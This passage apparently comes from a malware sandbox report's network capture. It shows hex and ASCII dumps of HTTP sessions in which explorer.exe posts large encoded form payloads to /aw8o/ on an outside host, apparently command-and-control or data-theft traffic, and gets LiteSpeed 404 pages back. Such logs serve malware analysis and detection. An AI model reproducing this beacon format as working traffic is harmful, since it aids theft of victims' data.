                                                                                                                                                                                          Aug 10, 2023 10:19:01.505079985 CEST278INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                          content-length: 1238
                                                                                                                                                                                          date: Thu, 10 Aug 2023 08:19:03 GMT
                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                                                                                                                          Aug 10, 2023 10:19:01.505095005 CEST279INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                                                                                                                          Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          5192.168.11.204972096.44.182.13180C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:04.033987999 CEST283OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.handsome-sex.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.handsome-sex.com
                                                                                                                                                                                          Referer: http://www.handsome-sex.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 52914
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 77 78 6d 35 47 4f 41 34 65 4e 6b 78 67 4f 70 62 58 6d 69 58 4c 34 38 47 70 6f 49 6c 65 57 41 61 7a 61 45 75 7a 69 33 6f 53 61 56 7a 6e 38 6d 58 74 42 4b 5a 6a 54 66 61 4b 44 73 35 4d 4e 68 50 59 58 2b 65 5a 4a 7a 30 78 39 61 66 41 56 69 55 4a 38 35 79 47 37 38 4f 5a 74 43 47 72 32 43 30 74 55 45 42 61 37 53 51 4f 6b 50 47 79 41 37 65 71 50 39 78 31 64 49 72 62 6a 70 39 56 62 4f 76 4f 6b 56 74 70 6d 49 6b 44 48 39 38 57 43 38 66 6b 53 6c 69 61 55 32 43 67 45 33 34 36 6a 64 50 36 7a 35 5a 73 69 74 47 78 74 74 50 34 68 56 6a 66 70 78 2b 74 79 5a 6c 4b 4a 72 74 64 72 51 62 65 58 78 63 65 69 54 36 55 68 6e 4e 64 6b 45 6c 48 51 35 2f 72 50 45 4b 39 4d 49 4a 6c 5a 42 79 6d 66 36 4d 52 77 37 56 41 77 48 58 6b 5a 6a 77 4b 45 31 62 43 45 75 5a 67 2b 48 50 59 70 70 48 6f 6f 73 46 71 51 6d 59 44 54 74 63 57 63 52 65 4a 4f 49 59 6b 51 64 6c 55 4e 53 6e 4a 74 38 73 58 55 33 39 35 2b 65 54 68 65 7a 47 46 54 32 2f 43 6f 6a 62 6d 63 66 4a 70 46 69 4a 5a 51 48 68 2b 43 6d 73 6e 38 69 53 74 7a 6c 37 4f 71 48 49 67 56 4a 47 38 4c 45 4f 6d 4a 6e 68 69 45 70 35 6f 39 4f 49 79 51 7a 50 6e 78 78 6b 76 49 51 49 38 47 47 36 72 62 57 2b 68 70 4d 73 42 63 31 68 4d 39 69 74 44 30 4d 64 46 74 68 4a 74 30 6b 47 6a 48 4a 56 54 55 49 42 31 6c 35 44 73 67 36 45 39 7a 39 32 57 62 34 44 54 37 6d 45 43 43 43 30 44 54 77 4e 30 6d 4f 79 52 75 4a 6a 53 47 43 65 43 35 41 77 46 65 62 6f 74 4f 31 46 49 6c 54 5a 62 47 78 49 4e 65 6c 73 74 73 79 4f 47 71 6f 76 6e 6d 55 4d 69 4f 2f 4b 59 4e 64 57 65 58 64 38 56 61 4d 43 61 4e 44 62 35 6b 73 72 43 65 67 70 57 6b 2f 7a 54 47 4e 43 63 30 4d 51 39 76 2b 66 56 6b 4f 45 63 5a 4d 65 78 71 4b 4f 4e 77 77 51 54 37 68 54 77 32 65 6a 76 37 36 76 5a 6e 49 38 4d 37 39 77 70 57 70 50 73 34 36 65 4b 5a 74 70 58 49 35 68 56 70 79 6d 69 39 51 49 6c 71 78 72 33 66 48 4c 76 38 64 7a 67 33 63 2b 6a 42 75 4b 33 64 61 62 7a 78 75 4c 6f 73 2b 68 77 36 6d 33 47 64 6e 39 31 73 74 45 79 2f 71 2f 47 47 52 35 4d 75 74 53 46 4d 30 45 6e 69 6d 4f 34 4d 6a 55 74 39 51 79 45 76 67 30 4a 65 4a 69 67 50 63 51 31 73 6c 37 6e 37 47 62 30 4c 4c 69 4d 35 39 6d 62 63 4e 6f 55 33 42 51 2f 51 42 48 74 44 70 77 46 33 64 48 6c 78 74 34 33 79 61 45 30 6e 77 41 73 5a 71 68 2b 65 36 6d 44 62 4f 41 4f 52 4e 73 55 57 63 2b 4b 57 4e 6e 2b 5a 69 33 57 2b 58 6f 2b 47 6f 38 75 32 45 76 61 53 46 4b 48 7a 48 49 48 67 69 68 76 7a 30 78 6e 35 77 31 43 68 4f 61 30 4c 76 31 6e 78 48 67 58 30 66 45 56 2f 33 79 43 4b 6c 74 35 55 56 4e 50 6c 6d 61 70 43 6a 78 78 46 38 35 78 50 73 30 36 6d 63 39 45 56 51 5a 6f 6a 56 73 37 75 4a 4c 74 66 6d 4f 66 33 30 79 4f 4a 32 35 6e 71 71 74 34 67 70 51 30 50 6c 2f 49 58 4d 35 67 50 62 35 36 2f 45 51 6b 6b 43 67 68 54 45 61 30 64 33 52 34 6e 66 39 49 50 6d 6b 6f 72 50 72 31 4a 4e 30 39 43 55 49 34 55 5a 46 50 65 47 4d 4b 5a 6a 31 7a 70 4a 6c 75 7a 4f 33 4e 6f 42 67 72 48 63 44 41 4f 55 55 58 6d 48 57 69 39 6b 5a 4b 68 48 73 39 66 76 50 65 57 4a 57 30 6e 35 47 34 6b 6d 50 61 4d 6b 50 42 4e 56 7a 30 6c 45 51 76 74 65 71 72 76 6d 41 6f 65 6b 48 37 34 57 43 71 50 69 39 65 45 5a 44 41 68 50 32 46 4c 51 31 58 6a 45 30 67 45 63 77 58 6f 46 4b 39 71 53 55 56 73 57 47 4f 35 75 45 39 65 46 43 65 6d 35 62 4d 4a 58 47 66 36 4a 35 6f 52 7a 49 38 46 48 79 4c 35 57 68 4b 55 62 6d 7a 69 56 77 7a 2b 37 58 38 76 49 43 63 6a 6c 77 47 66 30 6e 72 31 50 45 4f 64 53 6c 61 31 2f 4f 34 6c 7a 6e 75 4d 34 65 74 31 7a 55 38 58 66 45 4f 70 75 43 53 5a 4a 54 53 4a 42 30 42 4b 63 6b 76 6a 45 45 71 34 78 4d 49 54 71 36 41 33 73 42 51 6d 44 41 72 4f 6a 37 68 55 32 4c 62 6c 50 46 48 63 2b 69 2b 62 75 73 36 78 65 61 68 30 76 72 30 4a 2f 6b 44 6b 77 2b 7a 39 57 68 79 78 79 44 39 5a 50 72 55 79 74 66 4a 55 68 35 6e 30 4d 50 67 46 6f 35 37 61 76 30 36 66 76 62 65 63 51 5a 6c 38 7a 31 6e 64 4c 4f 7a 6e 5a 43 7a 4e 41 49 53 30 57 77 4b 7a 48 4d 73 70 66 51 63 35 66 53 53 6e 55 2f 57 72 41 63 78 69 37 45 75 77 37 68 32 2b 6c 36 76 69 66 36 72 56 65 4e 4a 47 6e 50 79 71 32 32 43 67 51 77 67 5a 53 75 68 6a 69 63 77 72 66 62 6e 35 65 36 34 32 6a 68 56 6c 7a 2b 61 5a 74 4d 37 5a 4e 45 31 42 46 77 6b 34 72 52 36 52 63 36 55 61 5a 32 56 74 48 49 33 70 6a 48 34
                                                                                                                                                                                          Data Ascii: 1NM6e=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
                                                                                                                                                                                          Aug 10, 2023 10:19:04.034089088 CEST292OUTData Raw: 6d 50 47 66 6d 50 4c 39 31 35 38 32 31 72 2b 50 2b 75 64 75 2f 31 51 68 2f 35 2b 79 72 36 56 30 6a 59 72 4e 51 41 45 2b 37 6e 64 6a 4b 35 67 44 33 75 48 4f 2f 43 57 4a 45 75 41 70 75 6d 4f 68 61 58 64 4f 33 6a 49 38 4d 4e 78 42 76 75 75 44 7a 67
                                                                                                                                                                                          Data Ascii: mPGfmPL915821r+P+udu/1Qh/5+yr6V0jYrNQAE+7ndjK5gD3uHO/CWJEuApumOhaXdO3jI8MNxBvuuDzgx57yxI3ekhztzmgF2KzP1YHy3HBW/hi8uLqrUk7eisOky9ecevpXfQViujWdAY9l5LFXoKTZylwVLqLXtEhVVjKfokBKOQLFKlCjO6d/p0bPaXBf8L8cpo3ND1ojVdfUBDqoxneZu1LQ5HdnplLYYAGUzK8syZuZt
                                                                                                                                                                                          Aug 10, 2023 10:19:04.197015047 CEST293OUTData Raw: 36 71 69 43 36 36 71 63 32 59 51 31 34 77 58 75 4c 62 4f 2f 74 2b 50 69 49 74 45 78 38 41 51 67 73 51 6d 65 56 64 56 57 49 33 6b 6c 41 34 4a 75 66 68 30 64 41 53 52 77 4f 78 53 77 31 46 71 4c 70 54 59 2b 71 61 6d 62 41 75 51 43 49 78 47 75 6f 58
                                                                                                                                                                                          Data Ascii: 6qiC66qc2YQ14wXuLbO/t+PiItEx8AQgsQmeVdVWI3klA4Jufh0dASRwOxSw1FqLpTY+qambAuQCIxGuoXW3hNZVRauoz0Sgu8ShV/4xWouJQgjit3FrNlNeWaCo3zwvePuyRv5WHVJgkRirCjlSamS2K+W6qUWQbD73uj6UTt4X4nzTLmxRx6rkhSeBOEzFWnnQgFh5YqP4F1MiuYD9lx6qf2X4Mz0qGgQaejPbDgs2JkAd5u5
                                                                                                                                                                                          Aug 10, 2023 10:19:04.197231054 CEST312OUTData Raw: 57 48 33 6f 47 38 52 35 5a 49 56 69 67 4f 66 70 73 55 5a 45 52 51 69 2b 59 49 69 77 69 49 50 6d 77 41 6d 56 41 4b 72 5a 54 43 52 4c 79 4f 44 59 57 6b 62 67 6a 2b 69 39 43 47 70 64 46 48 49 46 47 35 39 30 34 47 34 4a 55 36 49 6e 41 31 73 77 48 4e
                                                                                                                                                                                          Data Ascii: WH3oG8R5ZIVigOfpsUZERQi+YIiwiIPmwAmVAKrZTCRLyODYWkbgj+i9CGpdFHIFG5904G4JU6InA1swHNDJCS0J2x9k7uT61JOy4kHoetinZWqGn/jvtLHCfEK1c1jSsNgh4gUCTREliqB7mDzpPz42HgJL/H+Snfy9Lu+JhA69KeAHSUHdyw8dyvsB4OVPMWKv2eTQZOz4Rrmw7j+kKf2/L++mBTwQr536E4XHuml7Hh0/dK/
                                                                                                                                                                                          Aug 10, 2023 10:19:04.197307110 CEST313INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                          content-length: 1238
                                                                                                                                                                                          date: Thu, 10 Aug 2023 08:19:05 GMT
                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
